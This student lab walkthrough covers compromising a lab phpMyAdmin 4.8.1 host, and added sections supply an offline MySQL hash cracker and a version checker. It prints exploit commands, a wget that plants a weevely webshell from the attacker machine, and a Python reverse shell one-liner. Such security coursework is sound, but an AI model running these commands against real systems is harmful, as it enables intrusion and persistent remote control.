Lab 10.2 Exploiting nancurunir.shire.org - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki
Link to report:
https://docs.google.com/document/d/12XetSY7oRwMvElzVnzwryolhjDY4pQ5UadRc5A1EUwk/edit?usp=sharing
Since we only received a fully qualified domain name (FQDN), I knew I had to conduct some recon with tools.
- NSlookup:

Using shodan.io to explore the IP addresses returned by the nslookup, I was able to recognize that:
- Public IP addresses 76.223.54.146 and 13.248.169.48 are assigned to our FQDN target.
- DNS server: 10.0.17.2
I was confused as there were two IPs, so I decided to use nmap to dive deeper into the FQDN:
- Nmap scan on FQDN:

- Tells me that 76.223.54.146 is the currently active host.
Decided to run an nslookup on our FQDN against the internal DNS server (10.0.17.2) and found the target IP:

Name: nancurunir.shire.org Address: 10.0.5.28
Now, since I have the right IP, I can rip a good ol' port scan:

Info summarized:
| Open Port | State | Service | Version |
|---|---|---|---|
| 80/tcp | open | http | Apache httpd 2.4.52 ((Ubuntu)) |
Browsing to the website:

At this point I have just been looking at the source of the webpages and something that stood out to me on this initial index.html page was:

Not sure what this alt='shallnotpass' is, but will explore.
- Dirb Scan + Result:

- Notable findings:
  - Directory: http://10.0.5.28/phpmyadmin/
Browsing to this page:

A login portal!!! I used Firefox's network tab and reloaded the page to view the connection + redirects:

- Notable findings: v=4.8.1
- Since I know this is a PHP page, I wanted to find the version, which is php version = 4.8.1


- Was able to gather available info on the target and the source code of the 10.0.5.28/phpmyadmin login portal:

- Username: gandalf
- Password: shallnotpass
Admin view of the website:

- Confirmed the phpMyAdmin version is 4.8.1 and the web server is Apache/2.4.52:

- Knowing MySQL was being used as the DB, I looked at the user table:

- Root is on localhost and I can edit it. It has all the permissions we are seeking. Tried the edit mode to see what info is available:

- Password hash of root: `*2B72EB4F3B82A23BA9987F76675B83FE9FE8DDC8`
- Using crackstation.net to crack the hash revealed that the password for root is gandalfthewhite
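The shape of that hash (a leading `*` followed by 40 uppercase hex characters) is what identifies it as a MySQL `mysql_native_password` hash: `SHA1(SHA1(password))`, with no salt, which is exactly why a lookup-table service like crackstation can reverse it. The script below is an added example, not part of the lab or of any tool used in it; it reproduces the check offline so a suspected password can be verified without pasting hashes into a third-party site. `ROOT_HASH` is the value read from the `mysql.user` table above; the wordlist is constructed for the example.

```python
"""Added example: reproduce the crackstation step offline.

A 41-character value beginning with '*' is a mysql_native_password hash:
    '*' + uppercase_hex(SHA1(SHA1(password)))
It is unsalted, so candidates can be checked without touching the target.
"""
import hashlib
import re
from typing import Iterable, Optional

# Hash copied from the lab writeup (mysql.user row for root@localhost).
ROOT_HASH = "*2B72EB4F3B82A23BA9987F76675B83FE9FE8DDC8"

_HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")


def mysql_native_hash(password: str) -> str:
    """Return the mysql_native_password hash for a plaintext password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # raw 20-byte SHA1
    outer = hashlib.sha1(inner).hexdigest().upper()          # SHA1 of those bytes
    return "*" + outer


def is_native_hash(value: str) -> bool:
    """True if value has the shape of a mysql_native_password hash."""
    return bool(_HASH_RE.match(value.upper()))


def crack(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose hash equals target_hash, else None."""
    if not is_native_hash(target_hash):
        raise ValueError("not a mysql_native_password hash: %r" % target_hash)
    target = target_hash.upper()
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if mysql_native_hash(candidate) == target:
            return candidate
    return None


# Constructed wordlist: themed guesses of the kind used against the login portal.
WORDLIST = ["gandalf", "shallnotpass", "mithrandir", "gandalfthegrey", "gandalfthewhite"]

if __name__ == "__main__":
    print("root password:", crack(ROOT_HASH, WORDLIST))
```

If crackstation's answer is right, `crack(ROOT_HASH, WORDLIST)` returns `gandalfthewhite`; swapping `WORDLIST` for a file opened with `open("rockyou.txt", errors="ignore")` turns it into a plain offline cracker for this hash type. The same function also doubles as a check for the password-reuse finding in the mitigation section: hash the host's root password and compare it with the value in `mysql.user`.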

After reviewing the searchsploit results that I received earlier, I dove deep into: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
Since I am using remote desktop I can copy and paste, so I copied the exploit code and created a file named RCE_Exploit50457.py. Reviewing the explanation on exploit-db, the syntax is: (created .py exploit file) (ipaddr) (port) (path) (username) (password) (cmd_to_be_run)
Tried to run the command `python3 RCE_Exploit50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass id`, which actually ran!!!!!!:

- Webshell: Using the tool weevely and the backdoor we created in week 8 (for me it is mayotte_backdoor.php), I created a webshell with `sudo weevely generate <password> ./mayotte_backdoor.php`:

- Opening a webserver:

- Now I opened another terminal and ran `python3 RCE_Exploit50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass 'wget http://10.0.17.85:8080/mayotte_backdoor.php'` to move the created webshell onto our target system with a wget:

- Using weevely to connect to the webshell we just popped onto our target: 10.0.5.28/phpmyadmin/fotp.php:

- See Challenges Faced for the explanation of the file name change. Had to redo this process.
- Creating a reverse shell in weevely: Used the following lab to create the python command:

```bash
export RHOST="10.0.17.85";export RPORT=4449;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
```

WHICH CREATED THE REVERSE WEBSHELL FOR FOOTHOLD!

- Switch to user gandalf using the password we cracked earlier:


- User flag: 82745644-c7f3-4250-acba-aa453abb2249
- Root flag: 22815793-a31c-42e5-ab46-a42241152c26

- phpMyAdmin portal version 4.8.1: High severity
  Exploit: https://www.exploit-db.com/exploits/50457
Explanation of exploit:
The script checks the phpMyAdmin version on the target to ensure it is either 4.8.0 or 4.8.1. It then performs a login using the provided credentials, crafts and executes an SQL query that contains a payload to execute the specified command, and finally retrieves the result of the executed command.
Mitigation:
- Update phpMyAdmin to a version that addresses this vulnerability: upgrade to phpMyAdmin 4.8.2 or newer.
- Use different passwords. The MySQL root password is the same as the host root password.
- Remove the alt='shallnotpass' tag from the image on the homepage of 10.0.5.28.
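One way to turn the first mitigation into a repeatable check, as an added example rather than anything from the lab: phpMyAdmin tags its script and stylesheet URLs with a `v=<version>` query parameter, which is where the `v=4.8.1` seen in the Firefox network tab comes from, so the login page alone is enough to tell whether the install is still below 4.8.2. The HTML fragments below are constructed for the example (shaped like phpMyAdmin's login page markup) and are not a capture from 10.0.5.28; `FIXED_VERSION` and the two versions the exploit targets are taken from the text above.

```python
"""Added example: flag a phpMyAdmin install that is below the patched
version named in the mitigation (4.8.2), using the v=<version> parameter
phpMyAdmin appends to its asset URLs."""
import re
from typing import Optional, Tuple

# Versions EDB-50457 checks for, and the first version the writeup calls fixed.
EXPLOIT_TARGETS = {"4.8.0", "4.8.1"}
FIXED_VERSION = "4.8.2"

# Matches "?v=4.8.1" or "&v=4.8.1" inside an asset URL.
_VERSION_RE = re.compile(r"[?&]v=(\d+(?:\.\d+)+)")


def parse_version(version: str) -> Tuple[int, ...]:
    """'4.8.1' -> (4, 8, 1) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def extract_version(html: str) -> Optional[str]:
    """Return the version from the first asset URL carrying v=..., if any."""
    match = _VERSION_RE.search(html)
    return match.group(1) if match else None


def exploit_targets(version: str) -> bool:
    """Mirror the exploit script's own version gate."""
    return version in EXPLOIT_TARGETS


def needs_upgrade(version: str) -> bool:
    """True when the version is older than FIXED_VERSION."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def check_target(html: str) -> str:
    """Classify a fetched login page as vulnerable / ok / unknown."""
    version = extract_version(html)
    if version is None:
        return "unknown: no v= asset parameter in response"
    if needs_upgrade(version):
        return "vulnerable: phpMyAdmin %s, upgrade to %s or newer" % (version, FIXED_VERSION)
    return "ok: phpMyAdmin %s" % version


# Constructed response fragments, shaped like phpMyAdmin's login page markup.
SAMPLE_LOGIN_PAGE = """<link rel="stylesheet" type="text/css" href="phpmyadmin.css.php?nocache=123&v=4.8.1">
<script src="js/jquery/jquery-2.1.4.min.js?v=4.8.1"></script>"""
PATCHED_LOGIN_PAGE = SAMPLE_LOGIN_PAGE.replace("4.8.1", "4.8.5")

if __name__ == "__main__":
    print(check_target(SAMPLE_LOGIN_PAGE))
    print(check_target(PATCHED_LOGIN_PAGE))
```

In practice the `html` argument is the body of `GET http://10.0.5.28/phpmyadmin/`; the check is deliberately read-only, so it can be re-run after the upgrade to confirm the asset URLs now carry a version at or above 4.8.2.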
This lab was extremely challenging and required me to take a step away multiple times. That being said, it was the most rewarding.
I faced some challenges (listed below), but working through them was extremely satisfying. My largest takeaway was: explore! Once I gained access to phpMyAdmin I took a while just sifting through the pages and fortunately found the user table. It was really fun using multiple different tools to conduct this lab.
- Challenges Faced:
After running the searchsploit scans and gathering as much data as possible, I was a bit stumped on how to move forward. I had the login portal but 0 credentials. I had a few different exploits to try too. I spoke with a classmate who referred me to the image alt tag I took note of earlier, but had 0 clue what shallnotpass meant. They pushed me to think about the target organization and the characters in LOTR. I tried many different characters but was able to guess the username to the phpMyAdmin page with the shallnotpass password.
After uploading the webshell to the target and connecting to the backdoor I ran into a problem:

I was really stumped here since I was really convinced I did the process correctly. I went through it again, but this time generated my webshell with the name mayottenancur.php:

Then pulled the webshell to the target and connected with Weevely which worked this time.